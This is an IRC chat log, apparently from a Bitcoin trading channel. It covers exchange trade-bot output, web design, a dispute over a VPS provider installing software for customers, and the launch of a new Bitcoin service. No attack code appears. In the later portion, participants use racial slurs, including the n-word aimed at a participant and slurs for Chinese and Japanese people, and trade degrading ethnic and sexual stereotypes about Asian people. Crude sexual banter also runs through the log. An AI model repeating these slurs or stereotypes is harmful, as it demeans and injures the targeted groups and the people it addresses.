shit Aug 21 07:30:32 now i need to make another order Aug 21 07:30:43 fuck dude Aug 21 07:30:44 18K? Aug 21 07:30:52 smoking is so last century Aug 21 07:31:03 you are not even old enough to smoke Aug 21 07:31:15 get a real addiction Aug 21 07:31:21 that was 18 pages on my screen Aug 21 07:31:22 !! Aug 21 07:31:50 but at least it has css! Aug 21 07:31:54 smickles: try growsing the net via dialup or gprs or something, doesnt work at all these days Aug 21 07:32:04 browsign too Aug 21 07:32:11 FUCK IT Aug 21 07:32:11 i swear there's a line in it that is "true";true:true,true;"true" Aug 21 07:32:24 wtf does that even mean? Aug 21 07:32:56 ahaha Aug 21 07:33:13 yeah Aug 21 07:33:15 dialup is useless Aug 21 07:33:27 I was in some backwater on gprs recently Aug 21 07:33:38 the slowest net i've used in the past few years is EDGE Aug 21 07:33:38 i'm going to use links for a month now Aug 21 07:33:40 twitter is the only thing that works Aug 21 07:33:44 dudes i dunno. i still make sites that work. Aug 21 07:33:47 and then all you can do is favorite shit to read later Aug 21 07:33:48 the rest of the world is nutso. Aug 21 07:33:50 ill take EDGE over dialup any day Aug 21 07:33:51 obviously Aug 21 07:34:01 i bet i'll come acoss 80% of the major websites have Aug 21 07:34:08 i used to use edge as my main uplink Aug 21 07:34:18 i had a linux box connected to edge via usb Aug 21 07:34:20 and a wifi Aug 21 07:34:30 and a loadbalancer on th elinux box to spread the packet sout Aug 21 07:34:30 "the new world order has already conqoured" Aug 21 07:34:38 it was decent Aug 21 07:34:43 EDGE for stability, wifi for speed Aug 21 07:34:48 [GLBSE] [OBSI.HRPT] 2 @ 0.1029 = 0.2058 BTC [+] Aug 21 07:34:53 but it was useless for long running conecctions Aug 21 07:34:58 smickles : look at trilema for instance. practically no js. Aug 21 07:35:06 bitvps has more js Aug 21 07:35:10 than all of you Aug 21 07:35:11 m,uahaha Aug 21 07:35:13 i bet. Aug 21 07:35:23 i dont think i use five lines. Aug 21 07:35:29 what i'm coding is pure html5 with some css Aug 21 07:35:45 (don't i feel trendy) Aug 21 07:36:02 html5 is pretty good actually. Aug 21 07:36:03 (do this after the interface is up) Aug 21 07:36:06 the css is in another file anyway Aug 21 07:36:09 um, lol Aug 21 07:36:39 dub i don't see anything i want to do that cant be done with css3 and html5 Aug 21 07:36:50 (weird acronymbers) Aug 21 07:36:52 sorry that was a mispaste Aug 21 07:36:57 lol Aug 21 07:37:00 I was making a note for myself Aug 21 07:37:01 [GLBSE] [FUTUREFUND] 350 @ 0.0001194 = 0.0418 BTC [+] Aug 21 07:37:30 [MPEX] [S.MPOE] 1640 @ 0.00039643 = 0.6501 BTC [-] Aug 21 07:37:31 [MPEX] [S.MPOE] 10000 @ 0.0004 = 4 BTC [+] Aug 21 07:37:42 this is crazy deposits keep flowing in Aug 21 07:37:54 for the past half hour i been trying to get off and water my plants Aug 21 07:38:15 you water your plants with that? Aug 21 07:38:19 .py 2000000*.0032 Aug 21 07:38:20 6400.0 Aug 21 07:38:31 mircea_popescu: over 64 hundred btc yet? Aug 21 07:38:34 I would think they'd prefer WATER Aug 21 07:38:42 but who knows Aug 21 07:38:46 Really mircea? Aug 21 07:38:50 Seems nice Aug 21 07:38:55 BTC-Mining yes. smickles surely. Aug 21 07:39:04 also, get better porn if its taking half an hour Aug 21 07:39:10 dub omg dun hate. Aug 21 07:39:23 it always took me +- half an hour Aug 21 07:39:26 in highschool too Aug 21 07:39:27 just don't make teh plants wait man Aug 21 07:39:40 don't get me wrong, slojackign ftw Aug 21 07:40:11 oh fuck man, the best porn i've come across has ~30 buildup, and it's a challenge for me to make it that long Aug 21 07:40:51 and i can say in my defense Aug 21 07:41:02 that it takes me about half an hour no matter how many galz are working it Aug 21 07:41:13 im so old I used to get porn off napster Aug 21 07:41:21 you sure you don't have a tumor or something mp? Aug 21 07:41:23 you don't have a choice about waiting Aug 21 07:41:32 smickles lol well... slotumor ? Aug 21 07:41:47 i'm just jelly Aug 21 07:41:54 but if you get vlc you can play it double speed Aug 21 07:41:58 (in more ways than one apparently) Aug 21 07:42:13 we ocasionally do this, great laughter. Aug 21 07:42:35 is it like squrrels going at it? Aug 21 07:42:40 playing the benny hill soundtrack Aug 21 07:43:04 lol, do that to hentai Aug 21 07:43:18 2x speed, ... so high pitch Aug 21 07:43:30 you'll crack an eardrum or something Aug 21 07:43:48 [GLBSE] [MERGEDMINING] 1 @ 0.095 BTC [+] Aug 21 07:43:52 [GLBSE] [OBSI.HRPT] 4 @ 0.1029 = 0.4116 BTC [+] Aug 21 07:44:25 i want to finish the nwe bitvps site Aug 21 07:45:52 ;;ident Aug 21 07:45:52 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Aug 21 07:46:11 IM GONNA FINISH IT Aug 21 07:48:44 [MPEX] [S.MPOE] 1687 @ 0.00041125 = 0.6938 BTC [+] Aug 21 07:51:06 honest opinion time Aug 21 07:51:13 do you think the new bitvps site im working on is better than the first? Aug 21 07:59:22 ahh much better Aug 21 07:59:32 smickles anyway, im curious how much the glbse passthrough brings Aug 21 08:00:32 i have a copywrite question Aug 21 08:00:42 so im working on our 'specialty serrvers' section Aug 21 08:00:48 don't download that car Aug 21 08:00:49 which is basically a VM image preconfigured with some shit Aug 21 08:00:55 so Aug 21 08:01:00 or the FBI in new zealand will fuck you up Aug 21 08:01:01 im putting a description of the product under it Aug 21 08:01:07 is it against the law to google the product Aug 21 08:01:11 then use what they have listed for thier site Aug 21 08:01:37 just change little bits Aug 21 08:01:39 MediaWiki is a free web-based wiki software application. Developed by the Wikimedia Foundation and others, it is used to run all of the Foundation's projects. Aug 21 08:01:45 ok Aug 21 08:03:17 [GLBSE] [ASICMINER] 20 @ 0.0989998 = 1.98 BTC [-] Aug 21 08:04:29 i didnt get that question rg Aug 21 08:04:40 you making what exactly, a clone of their product ? Aug 21 08:05:53 no Aug 21 08:05:57 we sell preconfigured VM images Aug 21 08:06:01 with the software installed Aug 21 08:06:05 look: Aug 21 08:06:17 http://wallet.bitvps.com/?page_id=5374 Aug 21 08:06:37 o, im pretty sure it's fine Aug 21 08:06:42 when i finish putting the descriptions Aug 21 08:06:51 i will make it so the descriptions show when you click the name Aug 21 08:06:55 [MPEX] [S.MPOE] 4900 @ 0.00041125 = 2.0151 BTC [+] Aug 21 08:06:58 pretty good ideea too i'd say Aug 21 08:07:08 yeah well im sick of people ordering VPS Aug 21 08:07:14 then complaining at me when thye cant install shit Aug 21 08:07:20 it will be a time saver to just do it myself Aug 21 08:07:31 yea Aug 21 08:07:35 like this guy the other day Aug 21 08:07:35 keep some images ready Aug 21 08:07:39 he asks me to install this list of packages Aug 21 08:07:46 then emails me saying Apache isnt setup to handle PHP files Aug 21 08:07:47 im like dude Aug 21 08:07:48 [MPEX] [S.MPOE] 22497 @ 0.00041125 = 9.2519 BTC [+] Aug 21 08:07:50 you didn't ask me to do that Aug 21 08:07:55 you said install PHP and Apache Aug 21 08:08:00 you didn't say anything baout configring anything Aug 21 08:08:14 he literally said 'just install these:' Aug 21 08:08:16 so i did Aug 21 08:08:39 lol Aug 21 08:08:46 i cant wait til i get my coin Aug 21 08:08:47 that i won Aug 21 08:08:52 it will be so kewl Aug 21 08:09:32 one of those casascius things ? Aug 21 08:09:44 yep Aug 21 08:09:53 it just has novelty value Aug 21 08:10:36 why is your answer not simply 'no' Aug 21 08:11:01 'sorry $customer, you purchased a VPS which infers that you require the ability to manage a server on your own' Aug 21 08:11:10 um cause i love our customers Aug 21 08:11:14 and i value their business? Aug 21 08:11:34 i know its hard to understand that when you've not done anything worthwhile Aug 21 08:11:35 you can say it nicely Aug 21 08:11:41 lol Aug 21 08:11:56 lol Aug 21 08:12:00 managing every application on every customers vps does not scale Aug 21 08:12:06 would be pretty awesome to send it just like that Aug 21 08:12:11 sorry $customer Aug 21 08:12:14 i dont manage them Aug 21 08:12:21 offer them a web hosting account and they will thank you in the long run Aug 21 08:12:21 the guy emailed me and asked if i could install them Aug 21 08:12:22 i said yes Aug 21 08:12:34 it took less than an hour to do it all Aug 21 08:12:39 including making it work Aug 21 08:12:41 and now you've set an expectation taht you will do so in future Aug 21 08:12:51 i will setup applications if people ask Aug 21 08:12:54 so that's fine Aug 21 08:12:57 if you suddenly had 10000 customers, and a small percentage start doing the same thing.. Aug 21 08:12:58 y u no be asshole rg! Aug 21 08:13:01 you are fucked Aug 21 08:13:04 i am an asshole Aug 21 08:13:08 but if i agree to do something Aug 21 08:13:09 a ok then Aug 21 08:13:09 i will do it Aug 21 08:13:14 [GLBSE] [UDN] 1 @ 0.099999 BTC [+] Aug 21 08:13:17 and your customers will be like 'BUT U DID DAT 4 US LAST TIME' Aug 21 08:13:27 and that's when i tell thm to buy management Aug 21 08:13:30 which we sell Aug 21 08:13:37 then you will need to hire more monkeys to help your customers Aug 21 08:13:37 the first ones always free Aug 21 08:13:41 dont you know anything about business Aug 21 08:13:41 jeez Aug 21 08:13:45 and your prices will rize Aug 21 08:13:57 dude, I've been around a lot onlger than you Aug 21 08:14:01 i can safely say prices are about as high as they will go Aug 21 08:14:02 [GLBSE] [NYAN.C] 10 @ 0.95 = 9.5 BTC [-] Aug 21 08:14:08 worked for much bigger business than you Aug 21 08:14:12 now that the low end VPS are gone Aug 21 08:14:15 sign ups have been a lot slower Aug 21 08:14:21 but we've retained the customers a lot longer Aug 21 08:14:23 which is what i wanted Aug 21 08:14:44 dub so since you worked for a big company Aug 21 08:14:48 you know how to run VPS company Aug 21 08:14:50 makes perfect sense Aug 21 08:15:00 you dont get it man Aug 21 08:15:05 i HATE the current hosting industry Aug 21 08:15:10 that's why i dont run my service like them Aug 21 08:15:11 [GLBSE] [007] 1 @ 0.199 BTC [-] Aug 21 08:15:11 I know that you need to have agreed service levels that are scaleable Aug 21 08:15:15 that's why my service was born Aug 21 08:15:16 in the first place Aug 21 08:15:21 dub Aug 21 08:15:22 dude Aug 21 08:15:24 are you retarded Aug 21 08:15:25 listen to me Aug 21 08:15:30 [GLBSE] [007] 2 @ 0.2 = 0.4 BTC [+] Aug 21 08:15:32 this guy emailed me, asked if i would, i said yes cause it was easy Aug 21 08:15:33 end of story Aug 21 08:15:38 beyond a point you will not be physically capable of managing a million little bespoke solutions Aug 21 08:15:40 i dont do it for every single customer Aug 21 08:15:47 and i dont manage their applications Aug 21 08:15:51 installing != managing Aug 21 08:15:52 idiot Aug 21 08:16:04 so take a fucking chill pill Aug 21 08:16:07 [GLBSE] [007] 2 @ 0.219 = 0.438 BTC [+] Aug 21 08:16:12 and go tell someone else how awesome you are cause you worked at a big company Aug 21 08:16:20 time will tell, this guy might have a lot of friends and say 'hey guys I know this cheap vps where they will hold your hand and wipe your bum' Aug 21 08:16:20 bespoke. i like that word. Aug 21 08:16:33 cheap vps? Aug 21 08:16:37 have you seen our prices? Aug 21 08:16:44 [GLBSE] [007] 2 @ 0.2273 = 0.4546 BTC [+] Aug 21 08:16:46 [GLBSE] [007] 3 @ 0.2274 = 0.6822 BTC [+] Aug 21 08:16:47 [GLBSE] [007] 4 @ 0.2275 = 0.91 BTC [+] Aug 21 08:16:53 awww i was hoping for a bespoke spiked helmet Aug 21 08:17:05 we are the most expensive vps provider that accepts bitcoin Aug 21 08:17:08 [GLBSE] [007] 1 @ 0.23 BTC [+] Aug 21 08:17:09 but we're also the best Aug 21 08:17:38 if people want a shit vps, there are plenty of companies providing Aug 21 08:17:45 at this rate i woder how long till someone sells "bvps sucks" in decimal shares lol Aug 21 08:17:50 [GLBSE] [UDN] 11 @ 0.099999 = 1.1 BTC [+] Aug 21 08:17:51 ok, so you install an application for this guy, then some remote root bug appears in it Aug 21 08:17:52 [GLBSE] [UDN] 9 @ 0.1089 = 0.9801 BTC [+] Aug 21 08:18:06 its not your fault but 'YOU INSTALLED IT IM CALLING THE POLICE' Aug 21 08:18:13 dub: wow for such a big company worker, im surprised youve not heard of auto updates Aug 21 08:18:22 not to mention i scan customers every 2 weeks Aug 21 08:18:26 and fix as needed Aug 21 08:18:26 come on dude Aug 21 08:18:32 auto updates? Aug 21 08:18:39 uh yea? Aug 21 08:18:48 [GLBSE] [TYGRR.BOND-P] 3 @ 0.7101337 = 2.1304 BTC [-] Aug 21 08:18:50 that is not goign to stop someoen gettgin rooted eventually Aug 21 08:18:55 as you well know Aug 21 08:19:10 so then what's your argument Aug 21 08:19:14 but im just giving another example Aug 21 08:19:22 if auto updates isnt going to protect them Aug 21 08:19:27 then me managing the server isnt going to either Aug 21 08:19:31 so wtf are you arguing? Aug 21 08:19:32 [GLBSE] [FOO.PPPPT] 2 @ 0.6603009 = 1.3206 BTC [-] Aug 21 08:19:34 [GLBSE] [FOO.PPPPT] 5 @ 0.64 = 3.2 BTC [-] Aug 21 08:19:35 [GLBSE] [MMM] 2 @ 0.8 = 1.6 BTC [+] Aug 21 08:19:38 try reading Aug 21 08:19:41 what I type Aug 21 08:19:53 I know the spelling sucks but its legible Aug 21 08:20:01 besides, that's not my responsibility Aug 21 08:20:03 as the ToS says Aug 21 08:20:11 all users are responsible for hteir own system security and anything the hackers do Aug 21 08:20:17 when/if its compromised Aug 21 08:21:00 [GLBSE] [JAH] 2 @ 0.1449 = 0.2898 BTC [+] Aug 21 08:21:02 [GLBSE] [JAH] 2 @ 0.1597 = 0.3194 BTC [+] Aug 21 08:21:03 [GLBSE] [JAH] 6 @ 0.19401 = 1.1641 BTC [+] Aug 21 08:21:25 'yes but your honour, mr bitvps INSTALLED the vulnerable application himself and I lost millions in ppcoins because of it, and here is a metric boatload of caselaw that shows ToS doesnt mean shit' Aug 21 08:21:32 [GLBSE] [BIB.PIRATE] 1 @ 0.7201 BTC [-] Aug 21 08:21:49 i idnt install a vulnerable application Aug 21 08:21:56 i installed the newest version available at the time of install Aug 21 08:22:00 end of story Aug 21 08:22:00 [GLBSE] [YARR] 2 @ 0.97 = 1.94 BTC [-] Aug 21 08:22:14 if you didn't want to get owned, you shoulda bought managed support Aug 21 08:22:46 [GLBSE] [PUREMINING] 10 @ 0.13899999 = 1.39 BTC [+] Aug 21 08:23:05 well I wouldnt like to test that in court, thats all im saying Aug 21 08:23:12 [MPEX] [O.BTCUSD.P200N] 6672 @ 1.15606936 = 7713.2948 BTC [-] Aug 21 08:23:16 dude, if you dont buy management Aug 21 08:23:16 [GLBSE] [PUREMINING] 5 @ 0.13899999 = 0.695 BTC [+] Aug 21 08:23:18 you dont get manageent Aug 21 08:23:20 its that simple Aug 21 08:23:48 [GLBSE] [JAH] 1 @ 0.19401 BTC [+] Aug 21 08:24:01 'so mr ghost, why did you install the eventually vulnerable application then fail to maintain it' Aug 21 08:24:08 [MPEX] [O.BTCUSD.P200N] 10628 @ 1.15606936 = 12286.7052 BTC [-] Aug 21 08:24:11 dude google translate is *awesome* at german Aug 21 08:24:14 'it was just a one off for the customer' Aug 21 08:24:17 ugh Aug 21 08:24:25 omfg my pex is borkt ?! Aug 21 08:24:42 see ya later 12k btc Aug 21 08:24:49 [GLBSE] [NYAN.C] 2 @ 0.988 = 1.976 BTC [+] Aug 21 08:24:55 'i offer this as a product to paying custoemrs but this guy needed help' Aug 21 08:25:07 check out this translation google translate gave me Aug 21 08:25:09 Care2x is a web-based hospital information system. It serves to integrate various information systems (within the hospital) in a single information system. Care2x is an open source project based on the GPL, ie The software and its source code are freely available for everyone. Aug 21 08:25:22 that's an awesome translation Aug 21 08:25:28 my pex is not borkt. Aug 21 08:25:43 rg: yes and Aug 21 08:25:45 dude now i know i'm taking off. people are using it to register otc option deals wtf. Aug 21 08:25:46 its not legal in the US Aug 21 08:25:54 no hospital can ever use it Aug 21 08:25:59 'so you offered a service, but didnt charge for it, well thats teh same as if you did, GUILTY' Aug 21 08:26:25 it doesnt have that special certification that costs a million dollars to get and the certification company is owned by the companies that make hospital software Aug 21 08:26:33 and they will deny you for certification and keep your million dollars Aug 21 08:26:33 d;uh. Aug 21 08:26:39 most of the us is like that by now huh Aug 21 08:26:49 who fucking cares Aug 21 08:26:58 FOSS hospital software works great in africa though Aug 21 08:26:59 you know many hospitals using bitcoin? Aug 21 08:27:04 saved thousands if not millions of lives Aug 21 08:27:10 looking to buy from providers who've been around less than a year? Aug 21 08:27:14 they cant afford the commercial software, and the foss software works better anyhow Aug 21 08:27:20 besides, maybe someone wants it to mess around Aug 21 08:27:24 and see what its like Aug 21 08:27:27 Diablo-D3 don't worry. just as soon as they can afford the commercial crap Aug 21 08:27:31 they will buy it. Aug 21 08:27:34 nope Aug 21 08:27:41 < mircea_popescu> smickles anyway, im curious how much the glbse passthrough brings <<< i'll need a little more context here Aug 21 08:27:41 because it wont be compatible with their cross-hospital network Aug 21 08:27:53 smickles you were asking about 6.4k Aug 21 08:27:55 i was just saying google gave a good translation Aug 21 08:27:58 you guys are faggots Aug 21 08:28:04 Diablo-D3 don't worry, that'll get fixed. Aug 21 08:28:15 i didn't say anthing about the application Aug 21 08:28:20 i simply said google translated german well Aug 21 08:28:23 and you guys have to hate immediately Aug 21 08:28:26 that's why you are faggots Aug 21 08:28:31 don't take your nicotine withdrawal symptoms out on us Aug 21 08:28:43 i have plenty of nicotine Aug 21 08:28:45 the juice is just trash Aug 21 08:28:48 hold on now, 6.4k? Aug 21 08:28:52 your mom Aug 21 08:29:01 .py 2000000*.0032 Aug 21 08:29:01 6400.0 Aug 21 08:29:01 mircea_popescu: over 64 hundred btc yet? Aug 21 08:29:08 ioh Aug 21 08:29:18 [GLBSE] [PUREMINING] 1 @ 0.13899999 BTC [+] Aug 21 08:29:29 smickles forgets what he was doing if he has sex. Aug 21 08:29:31 he's had sex. Aug 21 08:29:35 i asked that because i was trying to grep wether or not the 2mn shares would sell out Aug 21 08:29:36 ergo... say wut ? Aug 21 08:30:14 rapeghost- he dosent always lose arguments but wehn he does, he changes teh subject Aug 21 08:30:17 mn is million in your speak, right? Aug 21 08:30:23 yes Aug 21 08:30:50 !ticker s.mpoe Aug 21 08:30:52 [MPEX:S.MPOE] 1day: 0.0003536 / 0.00039127 / 0.00041245 (8063415 shares, 3,154.99 BTC), 30day: 0.0001 / 0.0003631 / 0.00041245 (53603042 shares, 19,463.28 BTC) Aug 21 08:31:19 well, right now there are ~760k shares of s.dice bid on Aug 21 08:31:27 yeah Aug 21 08:31:42 when does dice go live Aug 21 08:31:46 few more days? Aug 21 08:31:48 first batch on the 24th Aug 21 08:31:51 with all those deposits you were talkingabout, i was in fear that all 2mn of the first round would be bid on Aug 21 08:31:52 midnight gmt Aug 21 08:31:59 actually, still am Aug 21 08:32:02 smickles it might yes. Aug 21 08:32:21 impossible to know what people plan. but anyway, there's other stuff too, so Aug 21 08:32:24 6.4k btc will cover all 2mn shares, right? Aug 21 08:32:31 yes. Aug 21 08:32:52 if the glbse fund draws 5k or so its a no brainer it sells out Aug 21 08:33:01 you should get the other gambling sites on Aug 21 08:33:06 bitjack Aug 21 08:33:08 bitzino Aug 21 08:33:11 you have stats on the glbse fund? Aug 21 08:33:12 rg mion guy doesn't want to list Aug 21 08:33:23 i havent seen deadterra since yest so i dunno Aug 21 08:34:34 this is getting dicey Aug 21 08:34:40 lol ? Aug 21 08:34:49 well there's a 2nd run anyway on the 25th so Aug 21 08:34:55 heh, yes lol, and a reflection of nerves Aug 21 08:35:20 i have obligations to fill, and i want the best for people who have put their trust in me Aug 21 08:35:28 the more i contemplate it the more i like this listing structure i came up with Aug 21 08:35:33 3 batches adn all Aug 21 08:35:52 smickles o hey, you're a proper broker now, given orders with best effort on them ? Aug 21 08:36:09 don't you know it Aug 21 08:36:10 how does it feel lol. some people spend years in training Aug 21 08:36:30 it feels good to me Aug 21 08:37:07 [GLBSE] [OBSI.HRPT] 10 @ 0.1029 = 1.029 BTC [+] Aug 21 08:37:31 i'me fairly sure i'm providing a needed service to people who want it, and i don't have to take advantage of anyone' Aug 21 08:38:28 screw that sucker born every day mentality, i want us to all be equals Aug 21 08:38:46 well, im pretty sure there's a future for brokerage in the new bitcoin world. Aug 21 08:39:26 [GLBSE] [YABMC] 1 @ 0.132 BTC [+] Aug 21 08:39:32 smicles is a commie Aug 21 08:39:36 lol Aug 21 08:39:44 ;;tslb Aug 21 08:39:46 capitalism breeds pinkos everytwhere! Aug 21 08:39:46 Time since last block: 36 minutes and 36 seconds Aug 21 08:40:07 communism convinces people of the virtues of capitalism Aug 21 08:40:14 and viceversa. Aug 21 08:40:27 yeah, even if there's no financial walls, (like i said in the post on the s.dice thread) brokers should add value by gathering together all the exchange listings in one place and offering (possibly limited) advice on portfolios Aug 21 08:40:41 oh shit Aug 21 08:40:48 i didn't mean to sound communist Aug 21 08:40:54 jk jk Aug 21 08:41:09 on the "can't we all just be equal" line Aug 21 08:41:19 some are more equal than others Aug 21 08:41:20 lol Aug 21 08:41:21 i actually see the merits of communism, but don't see it as the best solution Aug 21 08:41:39 you want to practice communism, go to church Aug 21 08:41:40 but ya, reading that again, lol Aug 21 08:41:46 smickles the way it's designed right now you offer a valuable service to people who can't afford the 20 btc fee to make an acct or to the people who don't want to be bothered with gpg Aug 21 08:41:49 oh fuck church Aug 21 08:41:56 no Aug 21 08:41:59 my church is nice Aug 21 08:42:04 as are the people there Aug 21 08:42:05 well Aug 21 08:42:07 most of them Aug 21 08:42:11 still some assholes Aug 21 08:42:12 you go to church ? Aug 21 08:42:13 (well, i meant for me) Aug 21 08:42:28 well not in China Aug 21 08:42:30 none here Aug 21 08:42:32 no, i'm an atheist Aug 21 08:42:41 I'm like the only one in the whole city Aug 21 08:42:47 but when in the UK yes Aug 21 08:42:54 only one white or only one from your church ? Aug 21 08:42:54 a few times a week if possible Aug 21 08:43:01 both Aug 21 08:43:25 ya i had a friend who left for china, to teach there. left me his gf Aug 21 08:43:27 we don't sing and dance about it Aug 21 08:43:29 mircea_popescu: i was talking about the (possible) future of bitcoin brokerages Aug 21 08:43:30 he was the only white guy in the entire town Aug 21 08:43:41 happens a lot Aug 21 08:43:45 feel like a goldfish Aug 21 08:43:47 smickles a yeah. indeed, as one gaisn experience the advice could be truely valuable. Aug 21 08:44:29 ok bitches, http://smpake.com/ Aug 21 08:44:37 woah kak? Aug 21 08:44:54 kakobrekla did you see usagi's ? Aug 21 08:45:08 thats different Aug 21 08:45:29 is that just to/from mtgox? Aug 21 08:45:42 for now its just to mtgox Aug 21 08:45:47 gotta start somewhere Aug 21 08:45:59 Amount Error: Requested: 123.00000000 BTC, Max: 1 BTC Aug 21 08:46:09 that's a beta Aug 21 08:46:10 cant you read Aug 21 08:46:17 aparently not Aug 21 08:46:24 and apparently I can't spell either Aug 21 08:46:55 a parent ly Aug 21 08:47:06 no we must hate on kakobrekla Aug 21 08:47:11 so kakobrekla, this is your answer to zipconf? Aug 21 08:47:27 lol Aug 21 08:47:30 c'mon, can't i give nefario1 a little flak too? Aug 21 08:47:31 i did this in 2 days Aug 21 08:47:43 sure Aug 21 08:47:46 I'm his clone Aug 21 08:47:55 he wont mind Aug 21 08:48:08 ;) Aug 21 08:48:55 nefario needs to get a chinese chick to come here as glbse-pr Aug 21 08:49:19 or bitvps-pr Aug 21 08:49:29 Ah you rike VPS service? Aug 21 08:49:38 that'd prolly just be you in disguize rg. Aug 21 08:49:46 honorable owner james very respectable Aug 21 08:49:56 1 jiggabits! Aug 21 08:50:00 much honor with this package Aug 21 08:50:12 did you hear that? Aug 21 08:50:22 1 jiggly tits ? Aug 21 08:50:22 it was every asian lady just saying fuck MPEX + BitVPS Aug 21 08:50:37 there's no azn ladies. don't you learn anythingfrom porn ? Aug 21 08:50:43 sometimes i wonder if bitvps would be as popular Aug 21 08:50:45 if it wasnt named bitvps Aug 21 08:50:47 wow the racism here is off the charts Aug 21 08:50:53 not even accurate steriotypes Aug 21 08:50:59 nefario1: that's why its not racism Aug 21 08:51:00 its a joke Aug 21 08:51:12 rg is just butthurt cause he's a nigger. Aug 21 08:51:50 ii was gonna make a joke about taking a hammer to nefario's gf's feet Aug 21 08:51:54 but i couldnt put it togethre Aug 21 08:52:07 asians are broken in the brian Aug 21 08:52:09 brain Aug 21 08:52:13 they think small feet are sexy Aug 21 08:52:16 so htey break them Aug 21 08:52:18 and reset htem Aug 21 08:52:20 small feet ARe sexy. Aug 21 08:52:40 asian girls also have blood capsules inserted in ther vj Aug 21 08:52:44 to preten their virgins Aug 21 08:52:48 now that's fuckd up Aug 21 08:52:52 ya dude, and they eat babies. Aug 21 08:52:57 not to mention every asian porn video is a psuedo-rape video Aug 21 08:53:07 shit is disgusting Aug 21 08:53:08 yeah "asians" Aug 21 08:53:14 japs Aug 21 08:53:15 not chinks Aug 21 08:53:18 because thats even a country or ethnic group Aug 21 08:53:19 japs are the real broken ones Aug 21 08:53:31 chinese people are just poor Aug 21 08:53:31 japs are just weird Aug 21 08:53:34 japs are fucking in the head Aug 21 08:53:37 fucked* Aug 21 08:53:38 yeah Aug 21 08:53:39 no chinese are also weird Aug 21 08:53:40 ill agree with that Aug 21 08:53:44 in different ways Aug 21 08:53:45 nefario1: not as bad Aug 21 08:53:46 who's not weird ? Aug 21 08:53:49 rg Aug 21 08:53:50 jap's are weird with sex Aug 21 08:53:52 not they're worse Aug 21 08:53:54 chinese are weird with customs Aug 21 08:53:59 my biggest point of contention with the azn ppl is the stuff they eat. Aug 21 08:53:59 chinks are filthy Aug 21 08:54:07 but theyre poor Aug 21 08:54:10 that's why Aug 21 08:54:12 no Aug 21 08:54:26 you know what i worry about Aug 21 08:54:31 when theres no more sweatshops in asia Aug 21 08:54:33 they're filthy because they're thugs Aug 21 08:54:42 [MPEX] [S.MPOE] 33960 @ 0.00040868 = 13.8788 BTC [-] Aug 21 08:54:46 when theres no more sweatshops in asia, that means the countries will have upgraded Aug 21 08:54:52 from producers to buyers Aug 21 08:54:58 time for sweatshops in kentucky. Aug 21 08:55:06 yeah fuck kentucky Aug 21 08:55:12 i wish the US let the south suceed from the union Aug 21 08:55:19 who the fuck needs em Aug 21 08:55:56 [01:54] «--- asa (~asa@27.50.93.122) has Quit (Remote host closed the connection) Aug 21 08:55:57 wow Aug 21 08:56:01 theyre using 27 now Aug 21 08:56:04 all these new ugly ip blocs Aug 21 08:56:24 ugly IP blocks? Aug 21 08:56:30 yeah Aug 21 08:56:32 new IPs are ugly Aug 21 08:56:37 explain Aug 21 08:56:47 theyre not normal Aug 21 08:56:47 he has an old fetish. Aug 21 08:57:01 all european countries should be stuck in 193, 194, 195, 212, 213 and 217 Aug 21 08:57:08 and 62 Aug 21 08:57:42 the US gets 192, 198, 199, 204, 205 , 206, 207 208 209 63 64 65 66 67 68 69 70 71 72 73 Aug 21 08:57:48 etc Aug 21 08:58:00 now europe has seeped out Aug 21 08:58:13 oh that reminds me Aug 21 08:58:22 the new site needs a page for IPv6 only VPS Aug 21 08:58:44 the us gets 192 ?! Aug 21 08:58:57 how do russians loopback Aug 21 08:59:06 they dont get 192/8 Aug 21 08:59:11 only 192.168 Aug 21 08:59:18 is used Aug 21 08:59:34 interesting fact Aug 21 08:59:38 192.167 is actually italy Aug 21 08:59:43 kakobrekla charging 1-2 satoshi. i likes this Aug 21 08:59:59 heh Aug 21 09:00:08 this wont stay, you know. Aug 21 09:00:10 comes out of beta, changes to 1 btc Aug 21 09:00:16 :) Aug 21 09:00:25 charging for what Aug 21 09:00:28 TAKE MY MONEY Aug 21 09:00:35 smpake.com Aug 21 09:01:10 wow Aug 21 09:01:15 so you took that one places idea Aug 21 09:01:18 and actually did something with it Aug 21 09:01:19 good Aug 21 09:01:25 there, dividend just got paid Aug 21 09:01:26 zip something Aug 21 09:01:32 those guys never did shit Aug 21 09:01:51 kakobrekla: lot of money to be made with that idea Aug 21 09:01:51 im thinking of publishing a post on teh forumu Aug 21 09:02:00 but do some txes Aug 21 09:02:13 tell me if is clear Aug 21 09:02:20 funny thing is, the zip thing imploded, kakobrekla implemented it over what was it, a day ? Aug 21 09:02:28 make it 2. Aug 21 09:02:31 :) Aug 21 09:02:32 yeah Aug 21 09:02:36 zipconf needed tons of money to get started Aug 21 09:02:39 kako sets a few hours aside a day Aug 21 09:02:41 and gets it done Aug 21 09:02:50 i need to send some girls to kidnap him and tie him up in my basement Aug 21 09:02:54 a keyboard in each hand Aug 21 09:03:34 lol, kakobrekla did you really do what rg just laid out there? Aug 21 09:03:58 yep he did. Aug 21 09:04:18 well i only got a few btc buffer at the moment, they had more :) Aug 21 09:04:19 THIS IS WHY IRC RULES Aug 21 09:04:23 but my is working Aug 21 09:04:31 Hello, Aug 21 09:04:31 Aug 21 09:04:31 I am an experienced website / logo designer /developer and Aug 21 09:04:31 content / article writer. I can provide you with logos and website Aug 21 09:04:31 design and development and articles for your website per your requirement. Aug 21 09:04:32 ok, well, for kakobrekla sake, let's try to break it Aug 21 09:04:33 her name's gina. Aug 21 09:04:38 and she'd like to per my requirement. Aug 21 09:04:42 smickles please do Aug 21 09:05:00 i bet gina could outcode kakobrekla Aug 21 09:05:16 ;> Aug 21 09:05:53 can luke Aug 21 09:06:06 ~must not be named Aug 21 09:06:24 reliably perform a 1 conf double spend? Aug 21 09:06:46 (with elegius) Aug 21 09:07:01 nah Aug 21 09:07:52 damn, well, can we get pirate with gpumak to do it? Aug 21 09:07:58 nope. Aug 21 09:08:19 [MPEX] [S.MPOE] 3400 @ 0.0003851 = 1.3093 BTC [-] Aug 21 09:08:21 [MPEX] [S.MPOE] 21600 @ 0.00037589 = 8.1192 BTC [-] Aug 21 09:08:37 .00037? really? Aug 21 09:08:51 The articles are original and plagiarism proof and the content is Aug 21 09:08:51 thoroughly researched to ensure accurate information. They Aug 21 09:08:51 are informative, copy scape proof & most importantly in simple Aug 21 09:08:51 English as this is the core requirement since 90% readers prefer simple Aug 21 09:08:51 reading. 